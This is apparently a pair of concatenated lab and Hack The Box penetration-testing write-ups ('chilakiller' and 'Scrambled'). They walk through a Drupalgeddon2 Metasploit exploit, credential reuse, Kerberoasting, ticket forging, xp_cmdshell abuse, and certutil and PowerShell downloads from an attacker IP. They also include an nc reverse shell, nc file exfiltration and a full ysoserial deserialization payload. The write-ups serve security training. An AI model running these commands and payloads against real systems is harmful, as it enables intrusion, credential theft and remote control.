ptd-chilakiller

.

.

┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat ports.nmap 
# Nmap 7.92 scan initiated Mon Aug 29 10:17:40 2022 as: nmap -sC -sV -oN ports.nmap 10.150.150.182
Nmap scan report for 10.150.150.182
Host is up (0.086s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
| 2048 8e:0a:83:30:6b:a5:ef:12:81:4a:8e:66:c6:f4:22:12 (RSA)
| 256 ef:77:5e:a9:59:19:de:f8:c3:f3:1c:2e:73:09:8a:8f (ECDSA)
|_ 256 b3:be:3b:05:0c:f7:62:24:ce:1b:5c:5b:df:cc:fc:23 (ED25519)
80/tcp open http nginx 1.4.0 (Ubuntu)
| fingerprint-strings: 
| GetRequest: 
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
| working. Further configuration is required.</p>
| <p>For online documentation and support please refer to
| href="http://nginx.org/">nginx.org</a>.<br/>
| Commercial support is available at
| href="http://nginx.com/">nginx.com</a>.</p>
| <p><em>Thank you for using nginx.</em></p>
| </body>
| </html>
| HTTPOptions: 
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Allow: OPTIONS,HEAD,HEAD,GET,HEAD,POST
| Content-Length: 0
| Connection: close
| Content-Type: text/html
| RTSPRequest: 
| HTTP/1.1 400 Bad Request
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Content-Length: 299
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>400 Bad Request</title>
| </head><body>
| <h1>Bad Request</h1>
| <p>Your browser sent a request that this server could not understand.<br />
| </p>
| <hr>
| <address>nginx 1.4.0 (Ubuntu) Server at 127.0.1.1 Port 80</address>
|_ </body></html>
|_http-title: Welcome to nginx!
|_http-server-header: nginx 1.4.0 (Ubuntu)
8080/tcp open http-proxy nginx 1.4.0 (Ubuntu)
| fingerprint-strings: 
| GetRequest: 
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
|--snipp--
\x2080</address>\n</body></
SF:html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 10:19:25 2022 -- 1 IP address (1 host up) scanned in 105.42 seconds
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]

.

 

┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat notes.txt
chilakiller
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set T
set TARGET set TARGETURI set TIMESTAMPOUTPUT
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set TARGETURI /restaurante
TARGETURI => /restaurante
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> run

[*] Started reverse TCP handler on 10.66.67.22:4444
[*] Running automatic check (“set AutoCheck false” to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.150.150.182
[*] Meterpreter session 1 opened (10.66.67.22:4444 -> 10.150.150.182:32828) at 2022-08-29 12:16:38 +0200

ls
ls
(Meterpreter 1)(/var/www/html/restaurante) >

cat freegift.html
<html>
<head>
<title>Redeem your free gift</title>
</head>
<body>
<!– FLAG4=3bbff3b43813668741aa213b2cd0cff29c0c7542 –>
</body>

</html>

www-data@chilakiller:/var/www/html/restaurante/sites/default$ cat settings.php | grep password
<nte/sites/default$ cat settings.php | grep password
* ‘password’ => ‘password’,
* username, password, host, and database name.
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
‘password’ => ‘EstaContraNoesTanImp0rtant3!!!’,
* by using the username and password variables. The proxy_user_agent variable
# $conf[‘proxy_password’] = ”;
www-data@chilakiller:/var/www/html/restaurante/sites/default$

www-data@chilakiller:/var/www/html/restaurante/sites/default$ mysql -u drupal -p
</html/restaurante/sites/default$ mysql -u drupal -p
Enter password: EstaContraNoesTanImp0rtant3!!!

Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.45-MariaDB-0+deb9u1 Debian 9.12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

MariaDB [(none)]>

MariaDB [drupaldb]> select * from ptd_users;
select * from ptd_users;
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | administrador | $S$Dobcr9v53WJdz6GsuhauWnwKNTm1pZpId6/rNl6psZwj2prE3d9V | chilakiller@ptd.local | | | NULL | 1596317328 | 1643552710 | 1643551677 | 1 | America/Mexico_City | | 0 | chilakiller@ptd.local | b:0; |
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
2 rows in set (0.00 sec)

MariaDB [drupaldb]>

www-data@chilakiller:/var/www/html/restaurante/sites/default$ su user1
su user1
Password: user1

user1@chilakiller:/var/www/html/restaurante/sites/default$ cd /home/user1
cd /home/user1
user1@chilakiller:~$ ls
ls
Desktop Documents FLAG3.txt
user1@chilakiller:~$ cat FLAG3.txt
cat FLAG3.txt
9a8cda5f343e89e68aaec65f1df3c61ae5176a19
user1@chilakiller:~$

user1@chilakiller:/etc/openvpn/client/.config$ cat .5OBdDQ80Py
cat .5OBdDQ80Py
hUqJ2
ChilaKill3s_Tru3_L0v3R
user1@chilakiller:/etc/openvpn/client/.config$

su root
pw = ChilaKill3s_Tru3_L0v3R

root@chilakiller:~# cat FLAG2.txt
cat FLAG2.txt
ccc61a1d18a937cc3db531a5216a04a805d54762

root@chilakiller:/var/www/html/restaurante# find / -name “FLAG1.txt”
find / -name “FLAG1.txt”
find: ‘/run/user/1000/gvfs’: Permission denied
find: ‘/proc/4683/task/4683/net’: Invalid argument
find: ‘/proc/4683/net’: Invalid argument
/var/www/html/test-site/test-2/FLAG1.txt
root@chilakiller:/var/www/html/restaurante# cat /var/www/html/test-site/test-2/FLAG1.txt
<rante# cat /var/www/html/test-site/test-2/FLAG1.txt
ed93e58c308d60f49e97e559ab557b86add97f44
root@chilakiller:/var/www/html/restaurante#

root@chilakiller:/var/www/html/restaurante# hostnamectl
hostnamectl
Static hostname: chilakiller
Icon name: computer-vm
Chassis: vm
Machine ID: c8677bebac964d43bed5ebe1af1caaa6
Boot ID: 907f69a447f04a8782bde75417cec04a
Virtualization: vmware
Operating System: Debian GNU/Linux 9 (stretch)
Kernel: Linux 4.9.0-13-amd64
Architecture: x86-64
root@chilakiller:/var/www/html/restaurante#

Author : Puckiestyle

 

htb-scrambled-nl

Scrambled

Scanning

> TARGET=10.10.11.168 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-15 23:15:44Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
4411/tcp  open  found?        syn-ack ttl 127
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49552/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

There are many open ports, this is seemingly a target on AD, with ldap and kerberos enabled. We need to do enum at several interesting places.

Found several domain names that might be useful later.

scrm.local
DC1.scrm.local
scramblecorp.com

Web Enum

Web enum found something interesting: http://scrm.local/support.html

04/09/2021: Due to the security breach last month we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use so please be patient while we work to resolve any issues 

http://scrm.local/supportrequest.html, there is also a username found in the screenshot, ksimpson.

http://scrm.local/salesorders.html, this page shows a client application used for this organisation. Later, we will find there is a server running on port 4411.

If you are experiencing a problem with the sales orders app, please enable debug logging and reproduce the problem. You can enable debug logging by doing the following: 

A log file named ScrambleDebugLog will have been created in the same folder you launched the sales app from. Send this file to us via email along with a description of the problem 

Directory enum didn’t find anything useful

> dirsearch -u http://scrm.local/ -x 403,401,500,400 -f
[19:48:54] Starting:
[19:50:00] 301 -  148B  - /assets  ->  http://scrm.local/assets/
[19:50:40] 301 -  148B  - /images  ->  http://scrm.local/images/
[19:50:41] 200 -    2KB - /index.html
[19:51:07] 200 -    2KB - /passwords.html
[19:51:41] 200 -    2KB - /support.html

Further page enum didn’t find anything intersting

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/FUZZ.html"

Subdomain enum didn’t find anything useful

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/" -H "Host: FUZZ.scrm.local"
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scramblecorp.com/" -H "Host: FUZZ.scramblecorp.com"

So, this target may not have much to do with web vectors.

Host Enum

Perform host enum, didn’t find anything useful

> enum4linux 10.10.11.168

Port 4411 Enum

Use nc to connect to the non-conventional port 4411, there seems to be a server application running here. But we cannot confirm what application it is.

> nc -vn 10.10.11.168 4411

LDAP Enum

Perform ldap enum using a simple python module

Python 3.10.4 (main, Mar 24 2022, 13:07:27) [GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ldap3
>>> server = ldap3.Server('10.10.11.168', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
>>> server.info

DSA info (from DSE):
  Supported LDAP versions: 3, 2
  Naming contexts: 
    DC=scrm,DC=local
    CN=Configuration,DC=scrm,DC=local
    CN=Schema,CN=Configuration,DC=scrm,DC=local
    DC=DomainDnsZones,DC=scrm,DC=local
    DC=ForestDnsZones,DC=scrm,DC=local

nmap scan using ldap scripts confirms the above results

> nmap -n -sV --script "ldap* and not brute" 10.10.11.168

Overall, nothing useful at this stage

Kerberos Enum

Perform username enum

> kerbrute userenum -d scrm.local --dc 10.10.11.168 /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt

2022/06/15 20:03:16 >  [+] VALID USERNAME:       administrator@scrm.local
2022/06/15 20:04:30 >  [+] VALID USERNAME:       asmith@scrm.local
2022/06/15 20:06:16 >  [+] VALID USERNAME:       Administrator@scrm.local
2022/06/15 20:07:39 >  [+] VALID USERNAME:       jhall@scrm.local
2022/06/15 20:16:59 >  [+] VALID USERNAME:       sjenkins@scrm.local
2022/06/15 20:18:19 >  [+] VALID USERNAME:       khicks@scrm.local
2022/06/15 20:30:25 >  [+] VALID USERNAME:       Asmith@scrm.local
2022/06/15 20:48:39 >  [+] VALID USERNAME:       ASMITH@scrm.local

And, we know there might be a user called ksimpson from the previous screenshot. We can confirm this. This user also happens to use a password that is same as the username.

> kerbrute bruteuser -d scrm.local --dc 10.10.11.168 pass.txt ksimpson

This user can be used to obtain a TGT, to do so, use getTGT.py. Note: you may encounter an error when running the getTGT.py script, fix the script according to https://github.com/SecureAuthCorp/impacket/issues/1206

> getTGT.py scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168
> export KRB5CCNAME=ksimpson.ccache
> impacket-GetUserSPNs scrm.local/ksimpson -k -dc-ip dc1.scrm.local -no-pass -request

Save the ticket to a file mssql.kirbi and crack using john

> john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt mssql.kirbi

The credential for sqlsvc is cracked.

We now have a service principal credential, sqlsvc:Pegasus60

Foothold

Via golden ticket impersonation, we can gain foothold as the service principal, for background refer to: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket

To do so, we need the ntlm hash of a valid account password and the domain SID

Get Domain SID using windapsearch, setup go-windapsearch, https://github.com/ropnop/windapsearch

> ./windapsearch -d 10.10.11.168 -u sqlsvc@scrm.local -p 'Pegasus60' --secure -j -m computers --full

Generate the ntlm hash for the password `Pegasus60` using https://codebeautify.org/ntlm-hash-generator, this gives b999a16500b87d17ec7f2e2a68778f05

Impersonate as Administrator, the uid is 500 by convention, read about how MS manage uid for more background.

> ticketer.py -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -nthash b999a16500b87d17ec7f2e2a68778f05 -user-id 500 Administrator -spn MSSQLSVC/dc1.scrm.local
> export KRB5CCNAME=Administrator.ccache

Connect to mssql via the impersonated ticket

> mssqlclient.py dc1.scrm.local -k

Enable cmdshell

> enable_xp_cmdshell
> xp_cmdshell("whoami")

Upload nc.exe and create a reverse shell, need to locate a folder where the current account can write to

> xp_cmdshell certutil.exe -urlcache -f http://10.10.16.3/nc.exe ..\..\Temp\nc.exe
> xp_cmdshell ..\..\Temp\nc.exe 10.10.16.3 4444 -e cmd.exe

Upload SharpHound.exe, I used this version: /usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.exe, and run SharpHound and transfer back to kali for analysis

> certutil.exe -urlcache -f http://10.10.16.3/sh.exe sh.exe

From BloodHound analysis, we can find there is a tstar user from IT group, which has CanPSRemote right. However, this has proven to be useless after some trial and error.

PE

Upload winpeas

> certutil.exe -urlcache -f http://10.10.16.3/p.exe p.exe

# found something intersting from WinPeas
ScrmOrders(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Auto - Running - No quotes and Space detected

[+] Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
HR (Path: C:\Shares\HR) -- Permissions: AllAccess
IPC$ (Path: )
IT (Path: C:\Shares\IT) -- Permissions: AllAccess
NETLOGON (Path: C:\Windows\SYSVOL\sysvol\scrm.local\SCRIPTS)
Public (Path: C:\Shares\Public) -- Permissions: AllAccess
Sales (Path: C:\Shares\Sales) -- Permissions: AllAccess
SYSVOL (Path: C:\Windows\SYSVOL\sysvol)

There is a pdf document in C:\Shares\Public, it says HR has a database, which may contain user passwords

Check db for user passwords

> sqlcmd -q "select name from sys.databases"

Check tables in ScrambleHR

> sqlcmd -q "use ScrambleHR;select table_name from information_schema.tables"

# found
Employees
UserImport
Timesheets

Check table content of UserImport, found user MiscSvc with ldap credential

> sqlcmd -q "use ScrambleHR;select db_name();select * from UserImport;"

MiscSvc is an IT User, which mean, it has CanPSRemote permission, but evil-winrm doesn’t work.

Alternatively, use powershell reverse shell to login

> $SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
> $Cred = New-Object System.Management.Automation.PSCredential('scrm.local\MiscSvc', $SecPassword)
> Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1') } -Credential $Cred

# on kali
> rlwrap netcat -lvnp 6666

Receive reverse shell as miscsvc and catch the user flag

From previous enum, there is a server app running at C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe

Check the user that’s running the process received NA, the process might be run by an account with a higher privilege.

> tasklist /v

However we can access c:\shares\it, there is a copy of the Sale Order Client application and a dll file.

* Copy these two files to c:\temp
> nc.exe 10.10.16.3 7777 < ScrambleLib.dll
> nc.exe 10.10.16.3 7777 < ScrambleClient.exe
* On kali
> nc -vnlp 7777 > ScrambleLib.dll
> nc -vnlp 7777 > ScrambleClient.exe

Reverse Eng

We can find some seemingly operation codes from strings

> strings ScrambleLib.dll

Setup ilspy and reverse the dll, https://github.com/icsharpcode/ILSpy

> /root/.dotnet/tools/ilspycmd -p -o decompile ScrambleLib.dll

Read the decompiled code and understand how the commands work. The payloads are .net serialised.

Use ysoserial to exploit .net deserilisation vulnerabilities, this needs to run on windows, https://github.com/pwntester/ysoserial.net

> ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1') }"

Run a nc listener and upload the payload

> nc 10.10.16.3 4411
> UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA8ApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBdGdZOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0T0NJL1BnMEtQRTlpYW1WamRFUmhkR0ZRY205MmFXUmxjaUJOWlhSb2IyUk9ZVzFsUFNKVGRHRnlkQ0lnU1hOSmJtbDBhV0ZzVEc5aFpFVnVZV0pzWldROUlrWmhiSE5sSWlCNGJXeHVjejBpYUhSMGNEb3ZMM05qYUdWdFlYTXViV2xqY205emIyWjBMbU52YlM5M2FXNW1lQzh5TURBMkwzaGhiV3d2Y0hKbGMyVnVkR0YwYVc5dUlpQjRiV3h1Y3pwelpEMGlZMnh5TFc1aGJXVnpjR0ZqWlRwVGVYTjBaVzB1UkdsaFoyNXZjM1JwWTNNN1lYTnpaVzFpYkhrOVUzbHpkR1Z0SWlCNGJXeHVjenA0UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkNJK0RRb2dJRHhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWEl1VDJKcVpXTjBTVzV6ZEdGdVkyVStEUW9nSUNBZ1BITmtPbEJ5YjJObGMzTStEUW9nSUNBZ0lDQThjMlE2VUhKdlkyVnpjeTVUZEdGeWRFbHVabTgrRFFvZ0lDQWdJQ0FnSUR4elpEcFFjbTlqWlhOelUzUmhjblJKYm1adklFRnlaM1Z0Wlc1MGN6MGlMMk1nY0c5M1pYSnphR1ZzYkM1bGVHVWdTVzUyYjJ0bExVTnZiVzFoYm1RZ0xVTnZiWEIxZEdWeUlHUmpNU0F0VTJOeWFYQjBRbXh2WTJzZ2V5QkpSVmdvVG1WM0xVOWlhbVZqZENCT1pYUXVWMlZpUTJ4cFpXNTBLUzVrYjNkdWJHOWhaRk4wY21sdVp5Z25hSFIwY0Rvdkx6RXdMakV3TGpFMkxqTXZjMmhsYkd3dWNITXhKeWtnZlNJZ1UzUmhibVJoY21SRmNuSnZja1Z1WTI5a2FXNW5QU0o3ZURwT2RXeHNmU0lnVTNSaGJtUmhjbVJQZFhSd2RYUkZibU52WkdsdVp6MGllM2c2VG5Wc2JIMGlJRlZ6WlhKT1lXMWxQU0lpSUZCaGMzTjNiM0prUFNKN2VEcE9kV3hzZlNJZ1JHOXRZV2x1UFNJaUlFeHZZV1JWYzJWeVVISnZabWxzWlQwaVJtRnNjMlVpSUVacGJHVk9ZVzFsUFNKamJXUWlJQzgrRFFvZ0lDQWdJQ0E4TDNOa09sQnliMk5sYzNNdVUzUmhjblJKYm1adlBnMEtJQ0FnSUR3dmMyUTZVSEp2WTJWemN6NE5DaUFnUEM5UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJdVQySnFaV04wU1c1emRHRnVZMlUrRFFvOEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNEwL

Get the reverse shell and catch the root flag

rooted

.